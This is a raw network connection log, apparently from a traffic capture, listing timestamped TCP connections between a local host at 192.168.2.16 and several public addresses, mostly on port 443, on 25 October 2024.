                                                                                                                                                                                                                                                                                      Oct 25, 2024 00:05:50.757318020 CEST49728443192.168.2.16104.18.95.41
                                                                                                                                                                                                                                                                                      Oct 25, 2024 00:05:50.757334948 CEST44349728104.18.95.41192.168.2.16
                                                                                                                                                                                                                                                                                      Oct 25, 2024 00:05:50.757378101 CEST49728443192.168.2.16104.18.95.41
                                                                                                                                                                                                                                                                                      Oct 25, 2024 00:05:50.792067051 CEST49729443192.168.2.16104.18.95.41
                                                                                                                                                                                                                                                                                      Oct 25, 2024 00:05:50.792079926 CEST44349729104.18.95.41192.168.2.16
                                                                                                                                                                                                                                                                                      Oct 25, 2024 00:05:50.799058914 CEST44349728104.18.95.41192.168.2.16
                                                                                                                                                                                                                                                                                      Oct 25, 2024 00:05:50.799079895 CEST44349728104.18.95.41192.168.2.16
                                                                                                                                                                                                                                                                                      Oct 25, 2024 00:05:50.799170971 CEST49728443192.168.2.16104.18.95.41
                                                                                                                                                                                                                                                                                      Oct 25, 2024 00:05:50.840085030 CEST49729443192.168.2.16104.18.95.41
                                                                                                                                                                                                                                                                                      Oct 25, 2024 00:05:50.858835936 CEST44349729104.18.95.41192.168.2.16
                                                                                                                                                                                                                                                                                      Oct 25, 2024 00:05:50.858916044 CEST44349729104.18.95.41192.168.2.16
                                                                                                                                                                                                                                                                                      Oct 25, 2024 00:05:50.858951092 CEST44349729104.18.95.41192.168.2.16
                                                                                                                                                                                                                                                                                      Oct 25, 2024 00:05:50.858985901 CEST49729443192.168.2.16104.18.95.41
                                                                                                                                                                                                                                                                                      Oct 25, 2024 00:05:50.858988047 CEST44349729104.18.95.41192.168.2.16
                                                                                                                                                                                                                                                                                      Oct 25, 2024 00:05:50.858999968 CEST44349729104.18.95.41192.168.2.16
                                                                                                                                                                                                                                                                                      Oct 25, 2024 00:05:50.859042883 CEST49729443192.168.2.16104.18.95.41
                                                                                                                                                                                                                                                                                      Oct 25, 2024 00:05:50.859074116 CEST44349729104.18.95.41192.168.2.16
                                                                                                                                                                                                                                                                                      Oct 25, 2024 00:05:50.859112024 CEST49729443192.168.2.16104.18.95.41
                                                                                                                                                                                                                                                                                      Oct 25, 2024 00:05:50.859118938 CEST44349729104.18.95.41192.168.2.16
                                                                                                                                                                                                                                                                                      Oct 25, 2024 00:05:50.859500885 CEST44349729104.18.95.41192.168.2.16
                                                                                                                                                                                                                                                                                      Oct 25, 2024 00:05:50.859536886 CEST44349729104.18.95.41192.168.2.16
                                                                                                                                                                                                                                                                                      Oct 25, 2024 00:05:50.859544992 CEST49729443192.168.2.16104.18.95.41
                                                                                                                                                                                                                                                                                      Oct 25, 2024 00:05:50.859549999 CEST44349729104.18.95.41192.168.2.16
                                                                                                                                                                                                                                                                                      Oct 25, 2024 00:05:50.859586000 CEST49729443192.168.2.16104.18.95.41
                                                                                                                                                                                                                                                                                      Oct 25, 2024 00:05:50.872191906 CEST4968080192.168.2.16192.229.211.108
                                                                                                                                                                                                                                                                                      Oct 25, 2024 00:05:50.874834061 CEST44349728104.18.95.41192.168.2.16
                                                                                                                                                                                                                                                                                      Oct 25, 2024 00:05:50.874847889 CEST44349728104.18.95.41192.168.2.16
                                                                                                                                                                                                                                                                                      Oct 25, 2024 00:05:50.874902010 CEST44349728104.18.95.41192.168.2.16
                                                                                                                                                                                                                                                                                      Oct 25, 2024 00:05:50.874927998 CEST49728443192.168.2.16104.18.95.41
                                                                                                                                                                                                                                                                                      Oct 25, 2024 00:05:50.874948978 CEST44349728104.18.95.41192.168.2.16
                                                                                                                                                                                                                                                                                      Oct 25, 2024 00:05:50.874996901 CEST49728443192.168.2.16104.18.95.41
                                                                                                                                                                                                                                                                                      Oct 25, 2024 00:05:50.875751019 CEST44349728104.18.95.41192.168.2.16
                                                                                                                                                                                                                                                                                      Oct 25, 2024 00:05:50.875760078 CEST44349728104.18.95.41192.168.2.16
                                                                                                                                                                                                                                                                                      Oct 25, 2024 00:05:50.875811100 CEST49728443192.168.2.16104.18.95.41
                                                                                                                                                                                                                                                                                      Oct 25, 2024 00:05:50.918036938 CEST49678443192.168.2.1620.189.173.10
                                                                                                                                                                                                                                                                                      Oct 25, 2024 00:05:50.918150902 CEST44349728104.18.95.41192.168.2.16
                                                                                                                                                                                                                                                                                      Oct 25, 2024 00:05:50.918277979 CEST49728443192.168.2.16104.18.95.41
                                                                                                                                                                                                                                                                                      Oct 25, 2024 00:05:50.974313021 CEST44349729104.18.95.41192.168.2.16
                                                                                                                                                                                                                                                                                      Oct 25, 2024 00:05:50.974349976 CEST44349729104.18.95.41192.168.2.16
                                                                                                                                                                                                                                                                                      Oct 25, 2024 00:05:50.974474907 CEST49729443192.168.2.16104.18.95.41
                                                                                                                                                                                                                                                                                      Oct 25, 2024 00:05:50.974586010 CEST44349729104.18.95.41192.168.2.16
                                                                                                                                                                                                                                                                                      Oct 25, 2024 00:05:50.974611044 CEST44349729104.18.95.41192.168.2.16
                                                                                                                                                                                                                                                                                      Oct 25, 2024 00:05:50.974670887 CEST49729443192.168.2.16104.18.95.41
                                                                                                                                                                                                                                                                                      Oct 25, 2024 00:05:50.974699020 CEST44349729104.18.95.41192.168.2.16
                                                                                                                                                                                                                                                                                      Oct 25, 2024 00:05:50.975096941 CEST44349729104.18.95.41192.168.2.16
                                                                                                                                                                                                                                                                                      Oct 25, 2024 00:05:50.975164890 CEST49729443192.168.2.16104.18.95.41
                                                                                                                                                                                                                                                                                      Oct 25, 2024 00:05:50.975174904 CEST44349729104.18.95.41192.168.2.16
                                                                                                                                                                                                                                                                                      Oct 25, 2024 00:05:50.975229025 CEST49729443192.168.2.16104.18.95.41
                                                                                                                                                                                                                                                                                      Oct 25, 2024 00:05:50.975718021 CEST44349729104.18.95.41192.168.2.16
                                                                                                                                                                                                                                                                                      Oct 25, 2024 00:05:50.975799084 CEST49729443192.168.2.16104.18.95.41
                                                                                                                                                                                                                                                                                      Oct 25, 2024 00:05:50.993560076 CEST44349728104.18.95.41192.168.2.16
                                                                                                                                                                                                                                                                                      Oct 25, 2024 00:05:50.993711948 CEST44349728104.18.95.41192.168.2.16
                                                                                                                                                                                                                                                                                      Oct 25, 2024 00:05:50.993803024 CEST49728443192.168.2.16104.18.95.41
                                                                                                                                                                                                                                                                                      Oct 25, 2024 00:05:50.993824005 CEST44349728104.18.95.41192.168.2.16
                                                                                                                                                                                                                                                                                      Oct 25, 2024 00:05:50.993850946 CEST49728443192.168.2.16104.18.95.41
                                                                                                                                                                                                                                                                                      Oct 25, 2024 00:05:50.993880033 CEST49728443192.168.2.16104.18.95.41
                                                                                                                                                                                                                                                                                      Oct 25, 2024 00:05:50.994294882 CEST44349728104.18.95.41192.168.2.16
                                                                                                                                                                                                                                                                                      Oct 25, 2024 00:05:50.994368076 CEST49728443192.168.2.16104.18.95.41
                                                                                                                                                                                                                                                                                      Oct 25, 2024 00:05:50.994879007 CEST44349728104.18.95.41192.168.2.16
                                                                                                                                                                                                                                                                                      Oct 25, 2024 00:05:50.994970083 CEST49728443192.168.2.16104.18.95.41
                                                                                                                                                                                                                                                                                      Oct 25, 2024 00:05:51.036676884 CEST44349728104.18.95.41192.168.2.16
                                                                                                                                                                                                                                                                                      Oct 25, 2024 00:05:51.036799908 CEST49728443192.168.2.16104.18.95.41
                                                                                                                                                                                                                                                                                      Oct 25, 2024 00:05:51.089579105 CEST44349729104.18.95.41192.168.2.16
                                                                                                                                                                                                                                                                                      Oct 25, 2024 00:05:51.089673996 CEST49729443192.168.2.16104.18.95.41
                                                                                                                                                                                                                                                                                      Oct 25, 2024 00:05:51.089881897 CEST44349729104.18.95.41192.168.2.16
                                                                                                                                                                                                                                                                                      Oct 25, 2024 00:05:51.089966059 CEST49729443192.168.2.16104.18.95.41
                                                                                                                                                                                                                                                                                      Oct 25, 2024 00:05:51.090457916 CEST44349729104.18.95.41192.168.2.16
                                                                                                                                                                                                                                                                                      Oct 25, 2024 00:05:51.090502977 CEST44349729104.18.95.41192.168.2.16
                                                                                                                                                                                                                                                                                      Oct 25, 2024 00:05:51.090523958 CEST49729443192.168.2.16104.18.95.41
                                                                                                                                                                                                                                                                                      Oct 25, 2024 00:05:51.090531111 CEST44349729104.18.95.41192.168.2.16
                                                                                                                                                                                                                                                                                      Oct 25, 2024 00:05:51.090560913 CEST49729443192.168.2.16104.18.95.41
                                                                                                                                                                                                                                                                                      Oct 25, 2024 00:05:51.090589046 CEST49729443192.168.2.16104.18.95.41
                                                                                                                                                                                                                                                                                      Oct 25, 2024 00:05:51.105472088 CEST4434973135.190.80.1192.168.2.16
                                                                                                                                                                                                                                                                                      Oct 25, 2024 00:05:51.105741024 CEST49731443192.168.2.1635.190.80.1
                                                                                                                                                                                                                                                                                      Oct 25, 2024 00:05:51.105798006 CEST4434973135.190.80.1192.168.2.16
                                                                                                                                                                                                                                                                                      Oct 25, 2024 00:05:51.107271910 CEST4434973135.190.80.1192.168.2.16
                                                                                                                                                                                                                                                                                      Oct 25, 2024 00:05:51.107350111 CEST49731443192.168.2.1635.190.80.1
                                                                                                                                                                                                                                                                                      Oct 25, 2024 00:05:51.107620001 CEST49731443192.168.2.1635.190.80.1
                                                                                                                                                                                                                                                                                      Oct 25, 2024 00:05:51.107708931 CEST4434973135.190.80.1192.168.2.16
                                                                                                                                                                                                                                                                                      Oct 25, 2024 00:05:51.107737064 CEST49731443192.168.2.1635.190.80.1
                                                                                                                                                                                                                                                                                      Oct 25, 2024 00:05:51.112387896 CEST44349728104.18.95.41192.168.2.16
                                                                                                                                                                                                                                                                                      Oct 25, 2024 00:05:51.112484932 CEST49728443192.168.2.16104.18.95.41
                                                                                                                                                                                                                                                                                      Oct 25, 2024 00:05:51.112849951 CEST44349728104.18.95.41192.168.2.16
                                                                                                                                                                                                                                                                                      Oct 25, 2024 00:05:51.112941027 CEST49728443192.168.2.16104.18.95.41
                                                                                                                                                                                                                                                                                      Oct 25, 2024 00:05:51.113265991 CEST44349728104.18.95.41192.168.2.16
                                                                                                                                                                                                                                                                                      Oct 25, 2024 00:05:51.113332987 CEST49728443192.168.2.16104.18.95.41
                                                                                                                                                                                                                                                                                      Oct 25, 2024 00:05:51.113346100 CEST44349728104.18.95.41192.168.2.16
                                                                                                                                                                                                                                                                                      Oct 25, 2024 00:05:51.113404036 CEST49728443192.168.2.16104.18.95.41
                                                                                                                                                                                                                                                                                      Oct 25, 2024 00:05:51.113419056 CEST49728443192.168.2.16104.18.95.41
                                                                                                                                                                                                                                                                                      Oct 25, 2024 00:05:51.151333094 CEST4434973135.190.80.1192.168.2.16
                                                                                                                                                                                                                                                                                      Oct 25, 2024 00:05:51.157011032 CEST49731443192.168.2.1635.190.80.1
                                                                                                                                                                                                                                                                                      Oct 25, 2024 00:05:51.157052994 CEST4434973135.190.80.1192.168.2.16
                                                                                                                                                                                                                                                                                      Oct 25, 2024 00:05:51.172991991 CEST4968080192.168.2.16192.229.211.108
                                                                                                                                                                                                                                                                                      Oct 25, 2024 00:05:51.203985929 CEST49731443192.168.2.1635.190.80.1
                                                                                                                                                                                                                                                                                      Oct 25, 2024 00:05:51.207159042 CEST44349729104.18.95.41192.168.2.16
                                                                                                                                                                                                                                                                                      Oct 25, 2024 00:05:51.207250118 CEST49729443192.168.2.16104.18.95.41
                                                                                                                                                                                                                                                                                      Oct 25, 2024 00:05:51.207305908 CEST44349729104.18.95.41192.168.2.16
                                                                                                                                                                                                                                                                                      Oct 25, 2024 00:05:51.207407951 CEST49729443192.168.2.16104.18.95.41
                                                                                                                                                                                                                                                                                      Oct 25, 2024 00:05:51.207448006 CEST44349729104.18.95.41192.168.2.16
                                                                                                                                                                                                                                                                                      Oct 25, 2024 00:05:51.207513094 CEST49729443192.168.2.16104.18.95.41
                                                                                                                                                                                                                                                                                      Oct 25, 2024 00:05:51.207540989 CEST44349729104.18.95.41192.168.2.16
                                                                                                                                                                                                                                                                                      Oct 25, 2024 00:05:51.207596064 CEST49729443192.168.2.16104.18.95.41
                                                                                                                                                                                                                                                                                      Oct 25, 2024 00:05:51.208188057 CEST44349729104.18.95.41192.168.2.16
                                                                                                                                                                                                                                                                                      Oct 25, 2024 00:05:51.208262920 CEST49729443192.168.2.16104.18.95.41
                                                                                                                                                                                                                                                                                      Oct 25, 2024 00:05:51.258019924 CEST4434973135.190.80.1192.168.2.16
                                                                                                                                                                                                                                                                                      Oct 25, 2024 00:05:51.258358955 CEST49731443192.168.2.1635.190.80.1
                                                                                                                                                                                                                                                                                      Oct 25, 2024 00:05:51.258455038 CEST4434973135.190.80.1192.168.2.16
                                                                                                                                                                                                                                                                                      Oct 25, 2024 00:05:51.258534908 CEST49731443192.168.2.1635.190.80.1
                                                                                                                                                                                                                                                                                      Oct 25, 2024 00:05:51.320642948 CEST44349729104.18.95.41192.168.2.16
                                                                                                                                                                                                                                                                                      Oct 25, 2024 00:05:51.320718050 CEST44349729104.18.95.41192.168.2.16
                                                                                                                                                                                                                                                                                      Oct 25, 2024 00:05:51.320779085 CEST49729443192.168.2.16104.18.95.41
                                                                                                                                                                                                                                                                                      Oct 25, 2024 00:05:51.320800066 CEST44349729104.18.95.41192.168.2.16
                                                                                                                                                                                                                                                                                      Oct 25, 2024 00:05:51.320830107 CEST49729443192.168.2.16104.18.95.41
                                                                                                                                                                                                                                                                                      Oct 25, 2024 00:05:51.320857048 CEST49729443192.168.2.16104.18.95.41
                                                                                                                                                                                                                                                                                      Oct 25, 2024 00:05:51.321446896 CEST44349729104.18.95.41192.168.2.16
                                                                                                                                                                                                                                                                                      Oct 25, 2024 00:05:51.321481943 CEST44349729104.18.95.41192.168.2.16
                                                                                                                                                                                                                                                                                      Oct 25, 2024 00:05:51.321520090 CEST49729443192.168.2.16104.18.95.41
                                                                                                                                                                                                                                                                                      Oct 25, 2024 00:05:51.321525097 CEST44349729104.18.95.41192.168.2.16
                                                                                                                                                                                                                                                                                      Oct 25, 2024 00:05:51.321571112 CEST49729443192.168.2.16104.18.95.41
                                                                                                                                                                                                                                                                                      Oct 25, 2024 00:05:51.436367035 CEST44349729104.18.95.41192.168.2.16
                                                                                                                                                                                                                                                                                      Oct 25, 2024 00:05:51.436465025 CEST49729443192.168.2.16104.18.95.41
                                                                                                                                                                                                                                                                                      Oct 25, 2024 00:05:51.436496019 CEST44349729104.18.95.41192.168.2.16
                                                                                                                                                                                                                                                                                      Oct 25, 2024 00:05:51.436578989 CEST49729443192.168.2.16104.18.95.41
                                                                                                                                                                                                                                                                                      Oct 25, 2024 00:05:51.436613083 CEST44349729104.18.95.41192.168.2.16
                                                                                                                                                                                                                                                                                      Oct 25, 2024 00:05:51.436667919 CEST49729443192.168.2.16104.18.95.41
                                                                                                                                                                                                                                                                                      Oct 25, 2024 00:05:51.436719894 CEST44349729104.18.95.41192.168.2.16
                                                                                                                                                                                                                                                                                      Oct 25, 2024 00:05:51.436791897 CEST49729443192.168.2.16104.18.95.41
                                                                                                                                                                                                                                                                                      Oct 25, 2024 00:05:51.480912924 CEST44349729104.18.95.41192.168.2.16
                                                                                                                                                                                                                                                                                      Oct 25, 2024 00:05:51.481024027 CEST44349729104.18.95.41192.168.2.16
                                                                                                                                                                                                                                                                                      Oct 25, 2024 00:05:51.481039047 CEST49729443192.168.2.16104.18.95.41
                                                                                                                                                                                                                                                                                      Oct 25, 2024 00:05:51.481061935 CEST44349729104.18.95.41192.168.2.16
                                                                                                                                                                                                                                                                                      Oct 25, 2024 00:05:51.481090069 CEST49729443192.168.2.16104.18.95.41
                                                                                                                                                                                                                                                                                      Oct 25, 2024 00:05:51.481210947 CEST44349729104.18.95.41192.168.2.16
                                                                                                                                                                                                                                                                                      Oct 25, 2024 00:05:51.481261015 CEST49729443192.168.2.16104.18.95.41
                                                                                                                                                                                                                                                                                      Oct 25, 2024 00:05:51.481268883 CEST44349729104.18.95.41192.168.2.16
                                                                                                                                                                                                                                                                                      Oct 25, 2024 00:05:51.481295109 CEST49729443192.168.2.16104.18.95.41
                                                                                                                                                                                                                                                                                      Oct 25, 2024 00:05:51.484185934 CEST49732443192.168.2.16104.18.95.41
                                                                                                                                                                                                                                                                                      Oct 25, 2024 00:05:51.484271049 CEST44349732104.18.95.41192.168.2.16
                                                                                                                                                                                                                                                                                      Oct 25, 2024 00:05:51.484376907 CEST49732443192.168.2.16104.18.95.41
                                                                                                                                                                                                                                                                                      Oct 25, 2024 00:05:51.484550953 CEST49732443192.168.2.16104.18.95.41
                                                                                                                                                                                                                                                                                      Oct 25, 2024 00:05:51.484581947 CEST44349732104.18.95.41192.168.2.16
                                                                                                                                                                                                                                                                                      Oct 25, 2024 00:05:51.598855019 CEST49733443192.168.2.1652.149.20.212
                                                                                                                                                                                                                                                                                      Oct 25, 2024 00:05:51.598952055 CEST4434973352.149.20.212192.168.2.16
                                                                                                                                                                                                                                                                                      Oct 25, 2024 00:05:51.599122047 CEST49733443192.168.2.1652.149.20.212
                                                                                                                                                                                                                                                                                      Oct 25, 2024 00:05:51.600312948 CEST49733443192.168.2.1652.149.20.212
                                                                                                                                                                                                                                                                                      Oct 25, 2024 00:05:51.600342989 CEST4434973352.149.20.212192.168.2.16
                                                                                                                                                                                                                                                                                      Oct 25, 2024 00:05:51.725697041 CEST49734443192.168.2.16104.18.95.41
                                                                                                                                                                                                                                                                                      Oct 25, 2024 00:05:51.725816011 CEST44349734104.18.95.41192.168.2.16
                                                                                                                                                                                                                                                                                      Oct 25, 2024 00:05:51.726033926 CEST49734443192.168.2.16104.18.95.41
                                                                                                                                                                                                                                                                                      Oct 25, 2024 00:05:51.726231098 CEST49734443192.168.2.16104.18.95.41
                                                                                                                                                                                                                                                                                      Oct 25, 2024 00:05:51.726262093 CEST44349734104.18.95.41192.168.2.16
                                                                                                                                                                                                                                                                                      Oct 25, 2024 00:05:51.775994062 CEST4968080192.168.2.16192.229.211.108
                                                                                                                                                                                                                                                                                      Oct 25, 2024 00:05:52.082081079 CEST44349732104.18.95.41192.168.2.16
                                                                                                                                                                                                                                                                                      Oct 25, 2024 00:05:52.082494020 CEST49732443192.168.2.16104.18.95.41
                                                                                                                                                                                                                                                                                      Oct 25, 2024 00:05:52.082556963 CEST44349732104.18.95.41192.168.2.16
                                                                                                                                                                                                                                                                                      Oct 25, 2024 00:05:52.082895994 CEST44349732104.18.95.41192.168.2.16
                                                                                                                                                                                                                                                                                      Oct 25, 2024 00:05:52.083204985 CEST49732443192.168.2.16104.18.95.41
                                                                                                                                                                                                                                                                                      Oct 25, 2024 00:05:52.083276987 CEST44349732104.18.95.41192.168.2.16
                                                                                                                                                                                                                                                                                      Oct 25, 2024 00:05:52.083342075 CEST49732443192.168.2.16104.18.95.41
                                                                                                                                                                                                                                                                                      Oct 25, 2024 00:05:52.127376080 CEST44349732104.18.95.41192.168.2.16
                                                                                                                                                                                                                                                                                      Oct 25, 2024 00:05:52.128082037 CEST49732443192.168.2.16104.18.95.41
                                                                                                                                                                                                                                                                                      Oct 25, 2024 00:05:52.221765041 CEST44349732104.18.95.41192.168.2.16
                                                                                                                                                                                                                                                                                      Oct 25, 2024 00:05:52.221857071 CEST44349732104.18.95.41192.168.2.16
                                                                                                                                                                                                                                                                                      Oct 25, 2024 00:05:52.222059011 CEST49732443192.168.2.16104.18.95.41
                                                                                                                                                                                                                                                                                      Oct 25, 2024 00:05:52.222429991 CEST49732443192.168.2.16104.18.95.41
                                                                                                                                                                                                                                                                                      Oct 25, 2024 00:05:52.222466946 CEST44349732104.18.95.41192.168.2.16
                                                                                                                                                                                                                                                                                      Oct 25, 2024 00:05:52.336934090 CEST44349734104.18.95.41192.168.2.16
                                                                                                                                                                                                                                                                                      Oct 25, 2024 00:05:52.337249994 CEST49734443192.168.2.16104.18.95.41
                                                                                                                                                                                                                                                                                      Oct 25, 2024 00:05:52.337275028 CEST44349734104.18.95.41192.168.2.16
                                                                                                                                                                                                                                                                                      Oct 25, 2024 00:05:52.337785006 CEST44349734104.18.95.41192.168.2.16
                                                                                                                                                                                                                                                                                      Oct 25, 2024 00:05:52.338103056 CEST49734443192.168.2.16104.18.95.41
                                                                                                                                                                                                                                                                                      Oct 25, 2024 00:05:52.338186026 CEST44349734104.18.95.41192.168.2.16
                                                                                                                                                                                                                                                                                      Oct 25, 2024 00:05:52.338248968 CEST49734443192.168.2.16104.18.95.41
                                                                                                                                                                                                                                                                                      Oct 25, 2024 00:05:52.379333973 CEST44349734104.18.95.41192.168.2.16
                                                                                                                                                                                                                                                                                      Oct 25, 2024 00:05:52.484411001 CEST44349734104.18.95.41192.168.2.16
                                                                                                                                                                                                                                                                                      Oct 25, 2024 00:05:52.484595060 CEST44349734104.18.95.41192.168.2.16
                                                                                                                                                                                                                                                                                      Oct 25, 2024 00:05:52.484671116 CEST49734443192.168.2.16104.18.95.41
                                                                                                                                                                                                                                                                                      Oct 25, 2024 00:05:52.485400915 CEST49734443192.168.2.16104.18.95.41
                                                                                                                                                                                                                                                                                      Oct 25, 2024 00:05:52.485424042 CEST44349734104.18.95.41192.168.2.16
                                                                                                                                                                                                                                                                                      Oct 25, 2024 00:05:52.488133907 CEST49735443192.168.2.16104.18.95.41
                                                                                                                                                                                                                                                                                      Oct 25, 2024 00:05:52.488229036 CEST44349735104.18.95.41192.168.2.16
                                                                                                                                                                                                                                                                                      Oct 25, 2024 00:05:52.488322973 CEST49735443192.168.2.16104.18.95.41
                                                                                                                                                                                                                                                                                      Oct 25, 2024 00:05:52.488573074 CEST49735443192.168.2.16104.18.95.41
                                                                                                                                                                                                                                                                                      Oct 25, 2024 00:05:52.488615036 CEST44349735104.18.95.41192.168.2.16
                                                                                                                                                                                                                                                                                      Oct 25, 2024 00:05:52.538613081 CEST4434973352.149.20.212192.168.2.16
                                                                                                                                                                                                                                                                                      Oct 25, 2024 00:05:52.538713932 CEST49733443192.168.2.1652.149.20.212
                                                                                                                                                                                                                                                                                      Oct 25, 2024 00:05:52.542902946 CEST49733443192.168.2.1652.149.20.212
                                                                                                                                                                                                                                                                                      Oct 25, 2024 00:05:52.542922020 CEST4434973352.149.20.212192.168.2.16
                                                                                                                                                                                                                                                                                      Oct 25, 2024 00:05:52.543387890 CEST4434973352.149.20.212192.168.2.16
                                                                                                                                                                                                                                                                                      Oct 25, 2024 00:05:52.556374073 CEST49736443192.168.2.16104.18.95.41
                                                                                                                                                                                                                                                                                      Oct 25, 2024 00:05:52.556479931 CEST44349736104.18.95.41192.168.2.16
                                                                                                                                                                                                                                                                                      Oct 25, 2024 00:05:52.556570053 CEST49736443192.168.2.16104.18.95.41
                                                                                                                                                                                                                                                                                      Oct 25, 2024 00:05:52.556778908 CEST49736443192.168.2.16104.18.95.41
                                                                                                                                                                                                                                                                                      Oct 25, 2024 00:05:52.556809902 CEST44349736104.18.95.41192.168.2.16
                                                                                                                                                                                                                                                                                      Oct 25, 2024 00:05:52.590976954 CEST49733443192.168.2.1652.149.20.212
                                                                                                                                                                                                                                                                                      Oct 25, 2024 00:05:52.603600979 CEST49733443192.168.2.1652.149.20.212
                                                                                                                                                                                                                                                                                      Oct 25, 2024 00:05:52.647335052 CEST4434973352.149.20.212192.168.2.16
                                                                                                                                                                                                                                                                                      Oct 25, 2024 00:05:52.911802053 CEST4434973352.149.20.212192.168.2.16
                                                                                                                                                                                                                                                                                      Oct 25, 2024 00:05:52.911865950 CEST4434973352.149.20.212192.168.2.16
                                                                                                                                                                                                                                                                                      Oct 25, 2024 00:05:52.911887884 CEST4434973352.149.20.212192.168.2.16
                                                                                                                                                                                                                                                                                      Oct 25, 2024 00:05:52.911926031 CEST4434973352.149.20.212192.168.2.16
                                                                                                                                                                                                                                                                                      Oct 25, 2024 00:05:52.911971092 CEST4434973352.149.20.212192.168.2.16
                                                                                                                                                                                                                                                                                      Oct 25, 2024 00:05:52.911978006 CEST49733443192.168.2.1652.149.20.212
                                                                                                                                                                                                                                                                                      Oct 25, 2024 00:05:52.912050962 CEST4434973352.149.20.212192.168.2.16
                                                                                                                                                                                                                                                                                      Oct 25, 2024 00:05:52.912086010 CEST4434973352.149.20.212192.168.2.16
                                                                                                                                                                                                                                                                                      Oct 25, 2024 00:05:52.912090063 CEST49733443192.168.2.1652.149.20.212
                                                                                                                                                                                                                                                                                      Oct 25, 2024 00:05:52.912090063 CEST49733443192.168.2.1652.149.20.212
                                                                                                                                                                                                                                                                                      Oct 25, 2024 00:05:52.912117004 CEST49733443192.168.2.1652.149.20.212
                                                                                                                                                                                                                                                                                      Oct 25, 2024 00:05:52.912137032 CEST4434973352.149.20.212192.168.2.16
                                                                                                                                                                                                                                                                                      Oct 25, 2024 00:05:52.912161112 CEST49733443192.168.2.1652.149.20.212
                                                                                                                                                                                                                                                                                      Oct 25, 2024 00:05:52.912183046 CEST49733443192.168.2.1652.149.20.212
                                                                                                                                                                                                                                                                                      Oct 25, 2024 00:05:52.912195921 CEST4434973352.149.20.212192.168.2.16
                                                                                                                                                                                                                                                                                      Oct 25, 2024 00:05:52.912652016 CEST4434973352.149.20.212192.168.2.16
                                                                                                                                                                                                                                                                                      Oct 25, 2024 00:05:52.912731886 CEST49733443192.168.2.1652.149.20.212
                                                                                                                                                                                                                                                                                      Oct 25, 2024 00:05:52.922461987 CEST49733443192.168.2.1652.149.20.212
                                                                                                                                                                                                                                                                                      Oct 25, 2024 00:05:52.922461987 CEST49733443192.168.2.1652.149.20.212
                                                                                                                                                                                                                                                                                      Oct 25, 2024 00:05:52.922497034 CEST4434973352.149.20.212192.168.2.16
                                                                                                                                                                                                                                                                                      Oct 25, 2024 00:05:52.922519922 CEST4434973352.149.20.212192.168.2.16
                                                                                                                                                                                                                                                                                      Oct 25, 2024 00:05:52.990020990 CEST4968080192.168.2.16192.229.211.108
                                                                                                                                                                                                                                                                                      Oct 25, 2024 00:05:53.094942093 CEST44349735104.18.95.41192.168.2.16
                                                                                                                                                                                                                                                                                      Oct 25, 2024 00:05:53.095289946 CEST49735443192.168.2.16104.18.95.41
                                                                                                                                                                                                                                                                                      Oct 25, 2024 00:05:53.095338106 CEST44349735104.18.95.41192.168.2.16
                                                                                                                                                                                                                                                                                      Oct 25, 2024 00:05:53.095640898 CEST44349735104.18.95.41192.168.2.16
                                                                                                                                                                                                                                                                                      Oct 25, 2024 00:05:53.096199036 CEST49735443192.168.2.16104.18.95.41
                                                                                                                                                                                                                                                                                      Oct 25, 2024 00:05:53.096268892 CEST44349735104.18.95.41192.168.2.16
                                                                                                                                                                                                                                                                                      Oct 25, 2024 00:05:53.096498966 CEST49735443192.168.2.16104.18.95.41
                                                                                                                                                                                                                                                                                      Oct 25, 2024 00:05:53.139343977 CEST44349735104.18.95.41192.168.2.16
                                                                                                                                                                                                                                                                                      Oct 25, 2024 00:05:53.177006960 CEST44349736104.18.95.41192.168.2.16
                                                                                                                                                                                                                                                                                      Oct 25, 2024 00:05:53.178790092 CEST49736443192.168.2.16104.18.95.41
                                                                                                                                                                                                                                                                                      Oct 25, 2024 00:05:53.178852081 CEST44349736104.18.95.41192.168.2.16
                                                                                                                                                                                                                                                                                      Oct 25, 2024 00:05:53.180610895 CEST44349736104.18.95.41192.168.2.16
                                                                                                                                                                                                                                                                                      Oct 25, 2024 00:05:53.180989981 CEST49736443192.168.2.16104.18.95.41
                                                                                                                                                                                                                                                                                      Oct 25, 2024 00:05:53.181184053 CEST44349736104.18.95.41192.168.2.16
                                                                                                                                                                                                                                                                                      Oct 25, 2024 00:05:53.181274891 CEST49736443192.168.2.16104.18.95.41
                                                                                                                                                                                                                                                                                      Oct 25, 2024 00:05:53.223337889 CEST44349736104.18.95.41192.168.2.16
                                                                                                                                                                                                                                                                                      Oct 25, 2024 00:05:53.238185883 CEST44349735104.18.95.41192.168.2.16
                                                                                                                                                                                                                                                                                      Oct 25, 2024 00:05:53.238367081 CEST44349735104.18.95.41192.168.2.16
                                                                                                                                                                                                                                                                                      Oct 25, 2024 00:05:53.238607883 CEST49735443192.168.2.16104.18.95.41
                                                                                                                                                                                                                                                                                      Oct 25, 2024 00:05:53.239619017 CEST49735443192.168.2.16104.18.95.41
                                                                                                                                                                                                                                                                                      Oct 25, 2024 00:05:53.239648104 CEST44349735104.18.95.41192.168.2.16
                                                                                                                                                                                                                                                                                      Oct 25, 2024 00:05:53.331617117 CEST44349736104.18.95.41192.168.2.16
                                                                                                                                                                                                                                                                                      Oct 25, 2024 00:05:53.332190037 CEST44349736104.18.95.41192.168.2.16
                                                                                                                                                                                                                                                                                      Oct 25, 2024 00:05:53.332267046 CEST49736443192.168.2.16104.18.95.41
                                                                                                                                                                                                                                                                                      Oct 25, 2024 00:05:53.332310915 CEST44349736104.18.95.41192.168.2.16
                                                                                                                                                                                                                                                                                      Oct 25, 2024 00:05:53.332849979 CEST44349736104.18.95.41192.168.2.16
                                                                                                                                                                                                                                                                                      Oct 25, 2024 00:05:53.332923889 CEST49736443192.168.2.16104.18.95.41
                                                                                                                                                                                                                                                                                      Oct 25, 2024 00:05:53.334372044 CEST49736443192.168.2.16104.18.95.41
                                                                                                                                                                                                                                                                                      Oct 25, 2024 00:05:53.334403992 CEST44349736104.18.95.41192.168.2.16
                                                                                                                                                                                                                                                                                      Oct 25, 2024 00:05:53.871305943 CEST49737443192.168.2.16104.18.95.41
                                                                                                                                                                                                                                                                                      Oct 25, 2024 00:05:53.871355057 CEST44349737104.18.95.41192.168.2.16
                                                                                                                                                                                                                                                                                      Oct 25, 2024 00:05:53.871689081 CEST49737443192.168.2.16104.18.95.41
                                                                                                                                                                                                                                                                                      Oct 25, 2024 00:05:53.872031927 CEST49737443192.168.2.16104.18.95.41
                                                                                                                                                                                                                                                                                      Oct 25, 2024 00:05:53.872049093 CEST44349737104.18.95.41192.168.2.16
                                                                                                                                                                                                                                                                                      Oct 25, 2024 00:05:54.481693029 CEST44349737104.18.95.41192.168.2.16
